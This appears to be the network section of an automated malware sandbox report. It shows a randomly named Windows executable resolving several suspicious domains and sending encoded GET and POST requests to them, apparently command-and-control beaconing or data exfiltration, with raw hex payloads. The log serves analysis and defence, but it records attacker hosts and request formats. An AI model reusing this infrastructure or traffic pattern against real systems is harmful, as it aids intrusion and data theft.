                                                      Nov 25, 2024 13:55:40.879503965 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.879550934 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.882730007 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:41.002660036 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:46.292145014 CET4987780192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:55:46.412822008 CET804987713.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:55:46.412935972 CET4987780192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:55:46.428128958 CET4987780192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:55:46.551240921 CET804987713.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:55:47.613312006 CET804987713.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:55:47.613383055 CET4987780192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:55:47.941310883 CET4987780192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:55:48.061554909 CET804987713.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:55:48.960441113 CET4988380192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:55:49.083606005 CET804988313.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:55:49.083713055 CET4988380192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:55:49.098848104 CET4988380192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:55:49.219475031 CET804988313.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:55:50.191627979 CET804988313.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:55:50.191732883 CET4988380192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:55:50.613425970 CET4988380192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:55:50.733527899 CET804988313.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:55:51.632167101 CET4989280192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:55:51.753696918 CET804989213.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:55:51.753784895 CET4989280192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:55:51.769927979 CET4989280192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:55:51.890243053 CET804989213.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:55:51.890292883 CET804989213.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:55:52.855488062 CET804989213.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:55:52.855603933 CET4989280192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:55:53.285136938 CET4989280192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:55:53.405437946 CET804989213.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:55:54.304173946 CET4990080192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:55:54.431010962 CET804990013.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:55:54.431217909 CET4990080192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:55:54.440800905 CET4990080192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:55:54.614490032 CET804990013.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:55:55.660753965 CET804990013.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:55:55.660829067 CET804990013.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:55:55.660933018 CET4990080192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:55:55.668661118 CET4990080192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:55:55.788696051 CET804990013.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:56:01.064150095 CET4991680192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:56:01.184664965 CET804991613.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:56:01.184760094 CET4991680192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:56:01.200220108 CET4991680192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:56:01.321135044 CET804991613.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:56:02.389091015 CET804991613.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:56:02.389168024 CET4991680192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:56:02.706892014 CET4991680192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:56:02.827804089 CET804991613.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:56:03.726105928 CET4992280192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:56:03.846355915 CET804992213.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:56:03.846445084 CET4992280192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:56:03.862838030 CET4992280192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:56:03.983856916 CET804992213.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:56:05.031162977 CET804992213.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:56:05.031223059 CET4992280192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:56:05.378849030 CET4992280192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:56:05.504302979 CET804992213.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:56:06.400641918 CET4992880192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:56:06.520689011 CET804992813.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:56:06.520833015 CET4992880192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:56:06.536776066 CET4992880192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:56:06.657929897 CET804992813.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:56:06.658004999 CET804992813.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:56:07.625072956 CET804992813.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:56:07.625205994 CET4992880192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:56:08.050825119 CET4992880192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:56:08.363245964 CET4992880192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:56:08.365230083 CET804992813.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:56:08.483385086 CET804992813.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:56:08.483459949 CET4992880192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:56:09.117155075 CET4993480192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:56:09.237335920 CET804993413.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:56:09.237413883 CET4993480192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:56:09.250834942 CET4993480192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:56:09.371107101 CET804993413.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:56:10.385618925 CET804993413.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:56:10.385682106 CET804993413.248.169.48192.168.2.5
                                                      Nov 25, 2024 13:56:10.385824919 CET4993480192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:56:10.390033007 CET4993480192.168.2.513.248.169.48
                                                      Nov 25, 2024 13:56:10.510215998 CET804993413.248.169.48192.168.2.5
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Nov 25, 2024 13:55:14.992271900 CET6190853192.168.2.51.1.1.1
                                                      Nov 25, 2024 13:55:15.988215923 CET6190853192.168.2.51.1.1.1
                                                      Nov 25, 2024 13:55:17.004138947 CET6190853192.168.2.51.1.1.1
                                                      Nov 25, 2024 13:55:17.584368944 CET53619081.1.1.1192.168.2.5
                                                      Nov 25, 2024 13:55:17.584386110 CET53619081.1.1.1192.168.2.5
                                                      Nov 25, 2024 13:55:17.584395885 CET53619081.1.1.1192.168.2.5
                                                      Nov 25, 2024 13:55:29.786452055 CET6022253192.168.2.51.1.1.1
                                                      Nov 25, 2024 13:55:30.280425072 CET53602221.1.1.1192.168.2.5
                                                      Nov 25, 2024 13:55:45.898327112 CET6392653192.168.2.51.1.1.1
                                                      Nov 25, 2024 13:55:46.289225101 CET53639261.1.1.1192.168.2.5
                                                      Nov 25, 2024 13:56:00.679464102 CET6038053192.168.2.51.1.1.1
                                                      Nov 25, 2024 13:56:01.061225891 CET53603801.1.1.1192.168.2.5
                                                      Nov 25, 2024 13:56:15.398505926 CET6048653192.168.2.51.1.1.1
                                                      Nov 25, 2024 13:56:16.394551992 CET6048653192.168.2.51.1.1.1
                                                      Nov 25, 2024 13:56:16.932980061 CET53604861.1.1.1192.168.2.5
                                                      Nov 25, 2024 13:56:16.933128119 CET53604861.1.1.1192.168.2.5
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Nov 25, 2024 13:55:14.992271900 CET192.168.2.51.1.1.10x2954Standard query (0)www.funnystory.onlineA (IP address)IN (0x0001)false
                                                      Nov 25, 2024 13:55:15.988215923 CET192.168.2.51.1.1.10x2954Standard query (0)www.funnystory.onlineA (IP address)IN (0x0001)false
                                                      Nov 25, 2024 13:55:17.004138947 CET192.168.2.51.1.1.10x2954Standard query (0)www.funnystory.onlineA (IP address)IN (0x0001)false
                                                      Nov 25, 2024 13:55:29.786452055 CET192.168.2.51.1.1.10x8bedStandard query (0)www.nartex-uf.onlineA (IP address)IN (0x0001)false
                                                      Nov 25, 2024 13:55:45.898327112 CET192.168.2.51.1.1.10x92c3Standard query (0)www.aktmarket.xyzA (IP address)IN (0x0001)false
                                                      Nov 25, 2024 13:56:00.679464102 CET192.168.2.51.1.1.10xb1baStandard query (0)www.a1shop.shopA (IP address)IN (0x0001)false
                                                      Nov 25, 2024 13:56:15.398505926 CET192.168.2.51.1.1.10x13cbStandard query (0)www.cssa.auctionA (IP address)IN (0x0001)false
                                                      Nov 25, 2024 13:56:16.394551992 CET192.168.2.51.1.1.10x13cbStandard query (0)www.cssa.auctionA (IP address)IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Nov 25, 2024 13:55:17.584368944 CET1.1.1.1192.168.2.50x2954No error (0)www.funnystory.onlinefunnystory.onlineCNAME (Canonical name)IN (0x0001)false
                                                      Nov 25, 2024 13:55:17.584368944 CET1.1.1.1192.168.2.50x2954No error (0)funnystory.online172.104.82.74A (IP address)IN (0x0001)false
                                                      Nov 25, 2024 13:55:17.584386110 CET1.1.1.1192.168.2.50x2954No error (0)www.funnystory.onlinefunnystory.onlineCNAME (Canonical name)IN (0x0001)false
                                                      Nov 25, 2024 13:55:17.584386110 CET1.1.1.1192.168.2.50x2954No error (0)funnystory.online172.104.82.74A (IP address)IN (0x0001)false
                                                      Nov 25, 2024 13:55:17.584395885 CET1.1.1.1192.168.2.50x2954No error (0)www.funnystory.onlinefunnystory.onlineCNAME (Canonical name)IN (0x0001)false
                                                      Nov 25, 2024 13:55:17.584395885 CET1.1.1.1192.168.2.50x2954No error (0)funnystory.online172.104.82.74A (IP address)IN (0x0001)false
                                                      Nov 25, 2024 13:55:30.280425072 CET1.1.1.1192.168.2.50x8bedNo error (0)www.nartex-uf.online31.31.196.177A (IP address)IN (0x0001)false
                                                      Nov 25, 2024 13:55:46.289225101 CET1.1.1.1192.168.2.50x92c3No error (0)www.aktmarket.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                      Nov 25, 2024 13:55:46.289225101 CET1.1.1.1192.168.2.50x92c3No error (0)www.aktmarket.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                      Nov 25, 2024 13:56:01.061225891 CET1.1.1.1192.168.2.50xb1baNo error (0)www.a1shop.shop13.248.169.48A (IP address)IN (0x0001)false
                                                      Nov 25, 2024 13:56:01.061225891 CET1.1.1.1192.168.2.50xb1baNo error (0)www.a1shop.shop76.223.54.146A (IP address)IN (0x0001)false
                                                      Nov 25, 2024 13:56:16.932980061 CET1.1.1.1192.168.2.50x13cbNo error (0)www.cssa.auctioncssa.auctionCNAME (Canonical name)IN (0x0001)false
                                                      Nov 25, 2024 13:56:16.932980061 CET1.1.1.1192.168.2.50x13cbNo error (0)cssa.auction107.167.84.42A (IP address)IN (0x0001)false
                                                      Nov 25, 2024 13:56:16.933128119 CET1.1.1.1192.168.2.50x13cbNo error (0)www.cssa.auctioncssa.auctionCNAME (Canonical name)IN (0x0001)false
                                                      Nov 25, 2024 13:56:16.933128119 CET1.1.1.1192.168.2.50x13cbNo error (0)cssa.auction107.167.84.42A (IP address)IN (0x0001)false
                                                      • www.funnystory.online
                                                      • www.nartex-uf.online
                                                      • www.aktmarket.xyz
                                                      • www.a1shop.shop
                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.549812172.104.82.74801992C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 25, 2024 13:55:17.723021030 CET429OUTGET /2dyu/?RhqLA=IdOhgVq&Zvupu44p=bADo+7fqvlD2EEl6eQvhi6r6MxrwZqr7unPyaN6ymuSYop7wnq2+HbU7S+lsr3BB8s+/OWm3f+6bBn12YfZxgk/nttef79vSlz7njgVLZEtWvcnUQ3+FUHCaATxq3UQzYQ== HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.funnystory.online
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                      Nov 25, 2024 13:55:19.733114958 CET543INHTTP/1.1 301 Moved Permanently
                                                      Date: Mon, 25 Nov 2024 12:55:18 GMT
                                                      Server: Apache
                                                      X-Powered-By: PHP/8.2.25
                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                      X-Redirect-By: WordPress
                                                      Upgrade: h2,h2c
                                                      Connection: Upgrade, close
                                                      Location: http://funnystory.online/2dyu/?RhqLA=IdOhgVq&Zvupu44p=bADo+7fqvlD2EEl6eQvhi6r6MxrwZqr7unPyaN6ymuSYop7wnq2+HbU7S+lsr3BB8s+/OWm3f+6bBn12YfZxgk/nttef79vSlz7njgVLZEtWvcnUQ3+FUHCaATxq3UQzYQ==
                                                      Transfer-Encoding: chunked
                                                      Content-Type: text/html; charset=UTF-8
                                                      Nov 25, 2024 13:55:19.746376038 CET5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.54983831.31.196.177801992C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 25, 2024 13:55:30.642164946 CET691OUTPOST /9ul0/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.nartex-uf.online
                                                      Origin: http://www.nartex-uf.online
                                                      Referer: http://www.nartex-uf.online/9ul0/
                                                      Cache-Control: max-age=0
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 209
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                      Data Raw: 5a 76 75 70 75 34 34 70 3d 79 2b 4d 38 68 6c 52 67 59 6e 6c 63 79 36 4f 63 6a 6a 54 68 4e 46 66 53 4c 6a 2f 79 70 51 33 33 52 7a 68 65 4f 42 45 65 77 61 72 61 41 43 64 41 55 31 52 42 65 56 49 6b 56 5a 6a 65 73 4f 35 32 37 68 6b 4e 72 77 6a 7a 65 6c 68 72 6e 75 30 38 67 43 6b 4e 63 79 63 45 4b 53 47 66 31 4c 44 2f 41 35 55 43 5a 58 6b 47 31 53 6f 4a 4d 53 33 61 57 45 4f 47 73 6b 78 6f 76 61 56 71 59 44 74 33 57 42 44 77 6b 65 4c 48 35 6c 43 30 43 31 6b 66 67 41 33 43 77 2b 4f 50 72 47 47 45 70 54 4f 74 75 49 4d 67 6a 5a 38 6a 51 30 64 41 76 42 72 45 6a 5a 2b 6e 39 47 74 71 49 2f 55 34 75 75 56 4d 61 4f 64 70 6f 72 67 3d
                                                      Data Ascii: Zvupu44p=y+M8hlRgYnlcy6OcjjThNFfSLj/ypQ33RzheOBEewaraACdAU1RBeVIkVZjesO527hkNrwjzelhrnu08gCkNcycEKSGf1LD/A5UCZXkG1SoJMS3aWEOGskxovaVqYDt3WBDwkeLH5lC0C1kfgA3Cw+OPrGGEpTOtuIMgjZ8jQ0dAvBrEjZ+n9GtqI/U4uuVMaOdporg=
                                                      Nov 25, 2024 13:55:31.821615934 CET1236INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Mon, 25 Nov 2024 12:55:31 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Content-Encoding: gzip
                                                      Data Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 89 63 85 5f ba 7e 60 39 37 bc 67 c2 bf cd d9 ca 70 8c 1b d3 eb 02 74 d3 98 bf 7d b3 32 03 a3 33 5b 1a 9e 6f 06 7a f7 df 7f fd 7e 30 ea 86 77 1d 63 65 ea dd 5b cb bc 5b bb 5e 00 f8 5d 27 30 1d 28 75 67 cd 83 a5 3e 37 6f ad 99 39 20 3f 38 cb b1 02 cb b0 07 fe cc b0 4d 5d cc 82 f0 dc 6b 37 f0 53 00 1c d7 72 e6 e6 47 28 15 58 81 6d be fd e7 ff f1 3f ff b7 ff f9 bf fe f3 bf fe f9 ff fe f3 ff fe 9f ff fb 3f ff ab 03 17 ff e3 d4 b9 f6 d7 53 b8 fa af 7f fe 3f ff fc bf fe f9 3f f0 ea cd 19 [TRUNCATED]
                                                      Data Ascii: c000[sF0_Ap}83cg&64D" ROl}_/mf7R#M@UfeVVVfVUkV7Fzngfw-5`zwkrvc_~`97gpt}23[oz~0wce[[^]'0(ug>7o9 ?8M]k7SrG(Xm??S??m2w=| w3W+wMnla~>]7o|B<U],/rsf:&n*lwOz>m~S-LfY9S2& |=]YYKYa4NcGXD)tCe"JPG3oLbzm>xOeXLw+zExPomx0:u&w"^W{78YZl@a-HC]f|= ul)\x*ht6,k^e`Lvk@eps L5h&kq?;[,LUiL6%Im"E5]c_0wZTvk,D#eMm/POD&p^IVjRUBCIHr]AuHw^Ch"#<,vE+4>R-Ou91rQ [TRUNCATED]
                                                      Nov 25, 2024 13:55:31.821644068 CET1236INData Raw: 15 b2 4d 6b 3c 81 d4 b6 93 a9 46 a3 d6 35 26 9d 4c d2 a1 ef 31 f0 03 03 cc 94 b0 89 23 61 8f 89 aa 31 fc 44 6c a2 e9 2d 3d 7c 35 21 91 0d f2 83 d8 62 36 98 bb 03 c2 95 01 82 a7 02 bf 8b f0 18 7c 6c 86 c4 36 5d 67 20 aa 14 74 63 72 d9 a0 16 89 4c
                                                      Data Ascii: Mk<F5&L1#a1Dl-=|5!b6|l6]g tcrLcM$vahBZ(13%8Kd%5&A2dl[:J,A<~,1Y.0=D]U9FTTs5L@O)fG:RvWaIEzUe9
                                                      Nov 25, 2024 13:55:31.821661949 CET448INData Raw: 8d f2 b0 0d 75 36 39 b5 be f3 36 b9 28 48 32 93 51 6e df 7c 12 06 b9 5d b2 01 75 b7 31 5e 56 6b 7f 43 3c c3 8a 27 37 c2 23 ec cf 6b 80 37 ec 87 a8 e9 07 34 bc 33 7c 78 6a a3 db 3e ee f6 6c 36 43 b7 61 1f 84 0d 3f 9c a1 9d 61 c2 d3 1b d9 11 fa 67
                                                      Data Ascii: u696(H2Qn|]u1^VkC<'7#k743|xj>l6Ca?ag6BCYV<Qfa_$?!36Fn<^a_?e?18lb=3N_g>$g!\k$gTi<G,5\i]r#tQ\-
                                                      Nov 25, 2024 13:55:31.821796894 CET1236INData Raw: c2 48 29 ad 9f 25 57 36 94 a1 76 5d 59 38 47 33 c5 57 59 3a 43 b8 bc 50 cc 21 3b e1 50 cc f4 1c c3 7e 48 a5 16 b2 56 c6 8d 39 d9 78 76 af 8b 39 6a 27 e4 f7 99 7f 7b f3 fa e3 ca 9e 46 09 67 37 c1 62 30 e2 be 96 bf 83 07 1d 78 e0 f8 fa 2b 4c 61 3b
                                                      Data Ascii: H)%W6v]Y8G3WY:CP!;P~HV9xv9j'{Fg7b0x+La;9;dn$A<JGcUf%!?;6egakIVEUgk, 4yMxMv>$RB":p(y4*agqr/s4HZ09Jdf,7Ks
                                                      Nov 25, 2024 13:55:31.821811914 CET1236INData Raw: 2d cf 66 d2 ef 36 e5 d8 4c fa 4c 62 a1 b6 d9 f0 0b d6 74 26 ef fb 33 5a f5 49 e6 d4 03 5a f6 a5 c4 3d a3 75 cf 44 24 9b 85 9f 27 ed 99 ac 7c 26 8a 9a 59 fa a5 94 3d b9 b5 5f 49 18 bb c5 cf c4 1b 26 ab 3f cf 92 e7 b5 fc 4b 5b f3 6c d6 3f 13 97 19
                                                      Data Ascii: -f6LLbt&3ZIZ=uD$'|&Y=_I&?K[l?<e0(6{. =W;weYK8&Ix{Mlcs(oyl"Q?yS/v_(%Y7_l}/R~ZLa)y@=F=
                                                      Nov 25, 2024 13:55:31.821824074 CET448INData Raw: d4 30 48 4a cb 5c 41 1f ad 1e 6c 33 00 db 89 80 a1 af 01 25 ab 20 ed 16 63 aa 55 54 0a f3 00 5f 91 9b 7e 37 6e ab 37 05 27 b0 8d 95 bb 71 c8 9b 3b 63 64 66 fa 75 41 e3 d6 cb c3 a5 6a 30 fd 76 65 c0 02 9d 56 ce 85 74 0c 82 86 fa b6 95 4d 95 da 36
                                                      Data Ascii: 0HJ\Al3% cUT_~7n7'q;cdfuAj0veVtM65qko3U`aR2J-)_>*d|)e@5jT(^kvZm}).x,47h;%"9&a}{yivr&1D-Jk(U'|OUF!/zr
                                                      Nov 25, 2024 13:55:31.822355032 CET1236INData Raw: 28 d7 ea f0 7d c9 e1 ca 05 97 7f 40 a4 38 37 8d a4 96 17 99 f7 a0 17 81 0e 80 0b 2b 17 7a 3b ff da d9 d4 6a 71 36 66 1b 5e 90 90 6a 64 74 e1 6c 92 1b 4f 24 94 dc f6 8c ed 27 d0 de 66 0b e1 a5 dd 59 e7 b7 ef 5a 06 df 0f 20 fb 02 d9 9e 0d 2e f4 0d
                                                      Data Ascii: (}@87+z;jq6f^jdtlO$'fYZ .Q*0xC{0K7{Re9]*FEe,qqu(mmY@Ji&E;7WE#wBYwAxU|1s;t`3,@FBRzlsXH,
                                                      Nov 25, 2024 13:55:31.822365999 CET1236INData Raw: 50 d6 da b1 62 08 d7 d5 94 c6 55 9b f1 36 ae 56 c9 61 43 36 e6 33 61 37 de 6a 3e 8f d4 b1 6c cc 9a b7 7c 27 b7 e3 9a b5 3c af 60 5c f6 45 2c f4 15 2b d3 62 ed f0 0d 2d 25 55 d9 18 4d cb 56 72 d7 1c 99 d7 8b a2 40 94 63 88 a8 9c d4 a1 4a 78 51 89
                                                      Data Ascii: PbU6VaC63a7j>l|'<`\E,+b-%UMVr@cJxQ0IKYii,dDbb0J<wfhq-$S(z1qoRRPE\T5b~vZp!71U?:vg{("4Y}Pb^. Cn
                                                      Nov 25, 2024 13:55:31.822386980 CET448INData Raw: 21 9d 2b 79 4a 79 92 50 45 de 6c dc 9d 1b 81 31 21 81 aa 33 ff f6 e6 f5 c7 95 3d 45 db da 37 03 7d 13 2c 06 23 ee 6b f9 3b 78 d0 21 ed d4 5f 89 b2 2c bd ea 50 6a f4 57 92 a8 bd ea 80 1d 6f eb af 50 db bc ea 40 75 c7 d7 5f 2d 83 60 3d 39 3b bb bb
                                                      Data Ascii: !+yJyPEl1!3=E7},#k;x!_,PjWoP@u_-`=9;dn$Awqm\*&v<xq8yI:#~4L5~_*wE^U^4RjyY1TyUD3w$_c^beZGxi8k/(^h42W^"U|aS
                                                      Nov 25, 2024 13:55:31.823309898 CET1236INData Raw: 70 56 12 c9 4d 65 90 14 50 80 ad d0 f2 11 72 55 54 29 53 45 75 a0 80 44 84 97 22 ca 0d f0 10 f8 2c 03 61 32 b6 7a 0c 02 a0 02 23 c6 44 78 46 82 9c e6 e8 3b f9 9d f6 ee fb 22 47 65 94 9e 61 67 34 82 66 cd 06 40 81 4c 7a 0b f8 2a 2a 80 62 00 5d 34
                                                      Data Ascii: pVMePrUT)SEuD",a2z#DxF;"Geag4f@Lz**b]4G"( l PNF2@A0<K:<!P3 @'P4h!(,70P ]WqI[0t8!--Q.[70D48f#c6p~]
                                                      Nov 25, 2024 13:55:31.942569017 CET1236INData Raw: c2 0c ad 8d 46 49 fb d0 32 42 e3 1d d8 39 52 6f 65 f4 37 46 3f 48 22 1a 51 7f 93 c0 f4 50 e4 b0 ec f0 16 5c 12 71 3c fc 01 4c e6 f1 70 74 3b 06 13 43 53 7e a0 70 a0 b7 55 7e ac 0d 7f 10 6e c1 a6 06 2b 41 f9 33 f4 1d 78 78 b2 fc 83 a8 01 03 55 68
                                                      Data Ascii: FI2B9Roe7F?H"QP\q<Lpt;CS~pU~n+A3xxUh?KIUNSM@?Hm`PET65*l@GA>+Eo6?Cz0,?f_u+]x;X@]!u>CXc


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.54984531.31.196.177801992C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 25, 2024 13:55:33.298970938 CET711OUTPOST /9ul0/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.nartex-uf.online
                                                      Origin: http://www.nartex-uf.online
                                                      Referer: http://www.nartex-uf.online/9ul0/
                                                      Cache-Control: max-age=0
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 229
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                      Data Raw: 5a 76 75 70 75 34 34 70 3d 79 2b 4d 38 68 6c 52 67 59 6e 6c 63 67 4c 65 63 76 67 72 68 46 46 66 56 4f 6a 2f 79 67 77 33 37 52 7a 64 65 4f 44 6f 4f 78 6f 50 61 41 69 74 41 62 55 52 42 53 31 49 6b 65 35 69 31 78 65 35 68 37 68 35 77 72 78 50 7a 65 68 4a 72 6e 76 45 38 6a 7a 6c 2f 63 69 63 43 48 79 47 64 6f 37 44 2f 41 35 55 43 5a 58 42 6a 31 54 41 4a 4d 43 6e 61 57 68 36 48 79 30 78 72 2f 4b 56 71 63 44 74 7a 57 42 44 43 6b 66 58 2b 35 6e 4b 30 43 30 55 66 67 52 33 42 70 75 4f 46 30 57 48 7a 6b 77 4c 78 30 65 55 5a 6d 4c 78 65 52 6e 6c 43 6a 58 61 75 35 37 32 50 75 6d 42 53 59 73 63 50 2f 65 30 6c 41 74 4e 5a 32 38 31 6e 4b 75 53 49 4b 66 72 39 78 48 43 6d 4f 65 51 33 30 2b 57 53
                                                      Data Ascii: Zvupu44p=y+M8hlRgYnlcgLecvgrhFFfVOj/ygw37RzdeODoOxoPaAitAbURBS1Ike5i1xe5h7h5wrxPzehJrnvE8jzl/cicCHyGdo7D/A5UCZXBj1TAJMCnaWh6Hy0xr/KVqcDtzWBDCkfX+5nK0C0UfgR3BpuOF0WHzkwLx0eUZmLxeRnlCjXau572PumBSYscP/e0lAtNZ281nKuSIKfr9xHCmOeQ30+WS
                                                      Nov 25, 2024 13:55:34.693711042 CET1236INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Mon, 25 Nov 2024 12:55:34 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Content-Encoding: gzip
